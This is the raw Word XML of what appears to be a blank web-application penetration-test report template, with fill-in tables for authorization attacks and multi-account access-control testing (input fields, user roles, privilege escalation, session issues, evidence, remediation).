    <w:p w14:paraId="694B532D" w14:textId="77777777" w:rsidR="001E463C" w:rsidRDefault="001E463C" w:rsidP="000947B4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F14760" w:rsidRPr="00A51A96" w14:paraId="61CE6FF7" w14:textId="77777777" w:rsidTr="00642FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1DAF1BE9" w14:textId="5065E2A4" w:rsidR="00F14760" w:rsidRPr="003C713F" w:rsidRDefault="00F14760" w:rsidP="00725128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4.6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1C7059" w:rsidRPr="001C7059">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Authorization Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55C37954" w14:textId="77777777" w:rsidR="00C87E2C" w:rsidRPr="005569CC" w:rsidRDefault="00C87E2C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2356"/>
        <w:gridCol w:w="1147"/>
        <w:gridCol w:w="3503"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C70AC" w:rsidRPr="007C70AC" w14:paraId="634D0BAC" w14:textId="77777777" w:rsidTr="0016524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78E4874" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="0016524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C70AC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387E609C" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70A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C70AC" w:rsidRPr="007C70AC" w14:paraId="74581002" w14:textId="77777777" w:rsidTr="0016524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DC5BEDF" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="0016524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C70AC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46382E61" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70A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C70AC" w:rsidRPr="007C70AC" w14:paraId="7BEA5066" w14:textId="77777777" w:rsidTr="0016524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16B1595" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="0016524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C70AC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3427F4E2" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70A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84D6A" w:rsidRPr="007C70AC" w14:paraId="4B345A3C" w14:textId="77777777" w:rsidTr="0016524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328F843" w14:textId="0A4C64E6" w:rsidR="00884D6A" w:rsidRPr="007C70AC" w:rsidRDefault="00884D6A" w:rsidP="0016524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Attack</w:t>
            </w:r>
            <w:r w:rsidR="00B33455">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>s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Performed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5E1B45D7" w14:textId="77777777" w:rsidR="00884D6A" w:rsidRDefault="00884D6A" w:rsidP="007C70A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D7E77EC" w14:textId="77777777" w:rsidR="00884D6A" w:rsidRDefault="00884D6A" w:rsidP="007C70A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5C900E6" w14:textId="77777777" w:rsidR="00884D6A" w:rsidRPr="007C70AC" w:rsidRDefault="00884D6A" w:rsidP="007C70A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84D6A" w:rsidRPr="007C70AC" w14:paraId="3AEB2DE3" w14:textId="77777777" w:rsidTr="0016524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27D28CC" w14:textId="38AAE9C8" w:rsidR="00884D6A" w:rsidRDefault="00970BBC" w:rsidP="0016524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Approach Followed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5466FEF8" w14:textId="77777777" w:rsidR="00884D6A" w:rsidRDefault="00884D6A" w:rsidP="007C70A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93CA6FB" w14:textId="77777777" w:rsidR="00970BBC" w:rsidRDefault="00970BBC" w:rsidP="007C70A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692DB13" w14:textId="77777777" w:rsidR="00970BBC" w:rsidRDefault="00970BBC" w:rsidP="007C70A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C70AC" w:rsidRPr="007C70AC" w14:paraId="1E2AF6F0" w14:textId="77777777" w:rsidTr="007C70AC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="671B5223" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC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7C70AC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Identified Input Fields in Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C70AC" w:rsidRPr="007C70AC" w14:paraId="5221CF9A" w14:textId="77777777" w:rsidTr="00725128">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4710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1501014" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="500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7C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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785C6A1" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="500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7C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Query String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C70AC" w:rsidRPr="007C70AC" w14:paraId="1B350268" w14:textId="77777777" w:rsidTr="00725128">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4710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6261ADD" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="500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7C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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EE17AE9" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="500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7C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>POST Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C70AC" w:rsidRPr="007C70AC" w14:paraId="3C1795AE" w14:textId="77777777" w:rsidTr="00725128">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4710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BAA0760" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="500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7C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Hidden Tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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4E9E58A" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="500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7C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Headers </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C70AC" w:rsidRPr="007C70AC" w14:paraId="1AF9D11D" w14:textId="77777777" w:rsidTr="0016524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FD6170A" w14:textId="08D6F690" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="0016524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C70AC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 xml:space="preserve">Modified </w:t>
            </w:r>
            <w:r w:rsidR="004B73F2" w:rsidRPr="007C70AC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Valued</w:t>
            </w:r>
            <w:r w:rsidRPr="007C70AC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 Input Fields in HTTP Requests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033ECAE1" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70A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43528" w:rsidRPr="007C70AC" w14:paraId="16677B24" w14:textId="77777777" w:rsidTr="0016524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FC3E0AD" w14:textId="01E95398" w:rsidR="00C43528" w:rsidRPr="007C70AC" w:rsidRDefault="00B33455" w:rsidP="0016524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Are </w:t>
            </w:r>
            <w:r w:rsidR="00C43528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Attack</w:t>
            </w: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</w:t>
            </w:r>
            <w:r w:rsidR="00C43528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 Successful?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2E06DC9D" w14:textId="77777777" w:rsidR="00C43528" w:rsidRDefault="00C43528" w:rsidP="007C70A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C4352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[*Yes/No, Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33EA30C4" w14:textId="77777777" w:rsidR="00C43528" w:rsidRDefault="00C43528" w:rsidP="007C70A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478D032" w14:textId="77777777" w:rsidR="00C43528" w:rsidRDefault="00C43528" w:rsidP="007C70A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88F2411" w14:textId="4C7BDEA5" w:rsidR="00C43528" w:rsidRPr="00C43528" w:rsidRDefault="00C43528" w:rsidP="007C70A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7C70AC" w:rsidRPr="007C70AC" w14:paraId="2952B539" w14:textId="77777777" w:rsidTr="0016524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CD801ED" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="0016524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C70AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Is the Web Application Vulnerable to Authorization Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3503" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05CEE161" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC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7C70AC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6CA8F883" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC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7C70AC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7C70AC" w:rsidRPr="007C70AC" w14:paraId="7FA02BF9" w14:textId="77777777" w:rsidTr="0016524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4FF1A74" w14:textId="64CA554A" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="00C43528" w:rsidP="0016524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Evidence Collected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3473E70A" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="00C43528" w:rsidRDefault="00C43528" w:rsidP="007C70A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C4352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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263F93DC" w14:textId="77777777" w:rsidR="00C43528" w:rsidRDefault="00C43528" w:rsidP="007C70A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9A6D0AC" w14:textId="70182E45" w:rsidR="00C43528" w:rsidRPr="007C70AC" w:rsidRDefault="00C43528" w:rsidP="007C70A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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006773AC" w:rsidRPr="007C70AC" w14:paraId="1F7384A6" w14:textId="77777777" w:rsidTr="0016524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954B39E" w14:textId="2CED724E" w:rsidR="006773AC" w:rsidRDefault="006773AC" w:rsidP="0016524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Remediation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054942EB" w14:textId="77777777" w:rsidR="006773AC" w:rsidRDefault="006773AC" w:rsidP="007C70A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FDB69AD" w14:textId="77777777" w:rsidR="006773AC" w:rsidRDefault="006773AC" w:rsidP="007C70A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9F6BAF8" w14:textId="77777777" w:rsidR="006773AC" w:rsidRDefault="006773AC" w:rsidP="007C70A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D331165" w14:textId="77777777" w:rsidR="006773AC" w:rsidRDefault="006773AC" w:rsidP="007C70A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17BA4F1" w14:textId="77777777" w:rsidR="006773AC" w:rsidRPr="00C43528" w:rsidRDefault="006773AC" w:rsidP="007C70A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7C70AC" w:rsidRPr="007C70AC" w14:paraId="3FEC1F4B" w14:textId="77777777" w:rsidTr="0016524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EC3F953" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="0016524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C70AC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7F40C761" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="67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32DD975" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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0FC5C35" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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C6A3D17" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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2B65B0C" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70AC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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8CF9DF9" w14:textId="77777777" w:rsidR="007C70AC" w:rsidRPr="007C70AC" w:rsidRDefault="007C70AC" w:rsidP="007C70A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69E40276" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRPr="00A51A96" w:rsidRDefault="00B24CAC" w:rsidP="00B24CAC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4CAC" w14:paraId="1F68F7BB" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B3F495F" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75EEBFEA" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63455E54" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7740B320" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="050F9F7E" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="436650FB" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="473D8D77" w14:textId="77777777" w:rsidR="00B24CAC" w:rsidRDefault="00B24CAC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2A0753" w:rsidRPr="00A51A96" w14:paraId="4005012F" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5F078EFA" w14:textId="01E6B222" w:rsidR="002A0753" w:rsidRPr="003C713F" w:rsidRDefault="002A0753" w:rsidP="00725128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4.7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B33455" w:rsidRPr="00B33455">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test with Multiple User Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FC260C6" w14:textId="77777777" w:rsidR="002A0753" w:rsidRPr="00541B43" w:rsidRDefault="002A0753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6525"/>
      </w:tblGrid>
      <w:tr w:rsidR="00035E12" w:rsidRPr="00A02B04" w14:paraId="115BED13" w14:textId="77777777" w:rsidTr="00541B43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58AF4136" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00541B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02B04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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56659041" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04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35E12" w:rsidRPr="00A02B04" w14:paraId="25C2E013" w14:textId="77777777" w:rsidTr="00541B43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0EA2B51E" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00541B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02B04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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130AF0C1" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04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35E12" w:rsidRPr="00A02B04" w14:paraId="6E7E9F27" w14:textId="77777777" w:rsidTr="00541B43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401B0913" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00541B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634A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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68380560" w14:textId="77777777" w:rsidR="00035E12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8332E28" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04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35E12" w:rsidRPr="00A02B04" w14:paraId="7B3C0931" w14:textId="77777777" w:rsidTr="00541B43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0AAC8738" w14:textId="17953735" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00A24E83" w:rsidP="00541B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24E83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User Roles Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17CC2020" w14:textId="6CDDD78C" w:rsidR="00035E12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B32E7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A24E83" w:rsidRPr="00A24E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Admin, Regular User, Guest, etc.</w:t>
            </w:r>
            <w:r w:rsidR="00A24E8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CB8B267" w14:textId="77777777" w:rsidR="00035E12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D4500CA" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04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82994" w:rsidRPr="00A02B04" w14:paraId="16B04476" w14:textId="77777777" w:rsidTr="00541B43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722B7320" w14:textId="3DD3E29C" w:rsidR="00D82994" w:rsidRPr="00A24E83" w:rsidRDefault="00D82994" w:rsidP="00541B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Any Attacks Performed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2768D402" w14:textId="77777777" w:rsidR="00C91872" w:rsidRDefault="00C91872" w:rsidP="00C9187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[*Yes/No, Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74948A6F" w14:textId="77777777" w:rsidR="00D82994" w:rsidRDefault="00D82994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7EC7E27" w14:textId="77777777" w:rsidR="00D82994" w:rsidRPr="00B32E78" w:rsidRDefault="00D82994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82994" w:rsidRPr="00A02B04" w14:paraId="1C868309" w14:textId="77777777" w:rsidTr="00541B43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036F328E" w14:textId="54452935" w:rsidR="00D82994" w:rsidRDefault="00690757" w:rsidP="00541B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Are Attacks Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785F221B" w14:textId="77777777" w:rsidR="00D82994" w:rsidRDefault="00690757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[*Yes/No, Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1595CA0C" w14:textId="77777777" w:rsidR="00690757" w:rsidRDefault="00690757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BF336B4" w14:textId="1FE4135B" w:rsidR="00690757" w:rsidRDefault="00690757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35765" w:rsidRPr="00A02B04" w14:paraId="233CC9C0" w14:textId="77777777" w:rsidTr="00541B43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779759E9" w14:textId="51AB99BF" w:rsidR="00B35765" w:rsidRDefault="00B35765" w:rsidP="00541B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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1756BE0C" w14:textId="4BF43F7F" w:rsidR="00B35765" w:rsidRDefault="00860F97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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37EDFA6C" w14:textId="77777777" w:rsidR="00B35765" w:rsidRDefault="00B35765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4614911" w14:textId="77777777" w:rsidR="00B35765" w:rsidRDefault="00B35765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035E12" w:rsidRPr="00A02B04" w14:paraId="58D8B767" w14:textId="77777777" w:rsidTr="00541B43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49398567" w14:textId="291218E1" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00976693" w:rsidP="00541B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76693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Privilege Escalation Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EBF89C6" w14:textId="395D854F" w:rsidR="00035E12" w:rsidRPr="00665222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6522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976693" w:rsidRPr="0097669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Methods Used: Role Manipulation, Token Injection, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="0066522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5154419" w14:textId="77777777" w:rsidR="00035E12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BE264C0" w14:textId="77777777" w:rsidR="00035E12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73FE248" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04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35E12" w:rsidRPr="00A02B04" w14:paraId="0DB5B88F" w14:textId="77777777" w:rsidTr="00541B43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0D00BCB1" w14:textId="103B928B" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00BB7339" w:rsidP="00541B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BB733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Unauthorized Admin Actions from Low-Privilege Account?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="705396B5" w14:textId="034D40E0" w:rsidR="00035E12" w:rsidRPr="00BE09E4" w:rsidRDefault="00035E12" w:rsidP="00725128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BE09E4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BB7339" w:rsidRPr="00BB7339">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Features Affected</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE09E4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51C997BD" w14:textId="77777777" w:rsidR="00035E12" w:rsidRDefault="00035E12" w:rsidP="00725128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  <w:p w14:paraId="3DCEFC69" w14:textId="77777777" w:rsidR="00035E12" w:rsidRDefault="00035E12" w:rsidP="00725128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  <w:p w14:paraId="48B61E50" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00725128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035E12" w:rsidRPr="00A02B04" w14:paraId="015DA1DA" w14:textId="77777777" w:rsidTr="00541B43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0F760318" w14:textId="2B01BDE9" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="007A1E4A" w:rsidP="00541B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A1E4A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session Management Issues Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D616B96" w14:textId="19394765" w:rsidR="00035E12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595E2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91872" w:rsidRPr="00C9187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Session Fixation, Hijacking, Token Reuse, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E2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D69385A" w14:textId="77777777" w:rsidR="00035E12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8A3ACE3" w14:textId="77777777" w:rsidR="00035E12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A2C524A" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04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035E12" w14:paraId="30E7094D" w14:textId="77777777" w:rsidTr="00541B43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0016C7D2" w14:textId="4DF6ED14" w:rsidR="00035E12" w:rsidRPr="00E109FF" w:rsidRDefault="00BD1FEE" w:rsidP="00541B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D1FEE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>User Data Access Violations Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04FC696F" w14:textId="708F0F11" w:rsidR="00035E12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3276E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Yes/No, </w:t>
            </w:r>
            <w:r w:rsidR="00BD1FE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Give Details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2657164" w14:textId="77777777" w:rsidR="00035E12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8BC0789" w14:textId="77777777" w:rsidR="00035E12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079EF89" w14:textId="77777777" w:rsidR="00035E12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035E12" w14:paraId="0D581235" w14:textId="77777777" w:rsidTr="00541B43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2A5CA119" w14:textId="1DB1088A" w:rsidR="00035E12" w:rsidRPr="003276E4" w:rsidRDefault="00F61D5A" w:rsidP="00541B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61D5A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Access Control Enforcement Consistency?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9CF28E" w14:textId="3CE61406" w:rsidR="00035E12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F61D5A" w:rsidRPr="00F61D5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Consistent/Inconsistent, Details of Bypassed Restrictions if found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6120D73" w14:textId="77777777" w:rsidR="00035E12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D9AC2C8" w14:textId="77777777" w:rsidR="00035E12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52F2981" w14:textId="77777777" w:rsidR="00035E12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035E12" w14:paraId="185431BD" w14:textId="77777777" w:rsidTr="00541B43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06BF34A7" w14:textId="40D2E073" w:rsidR="00035E12" w:rsidRPr="00294B30" w:rsidRDefault="00F92BFD" w:rsidP="00541B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92BFD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>User Data Isolation Verified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
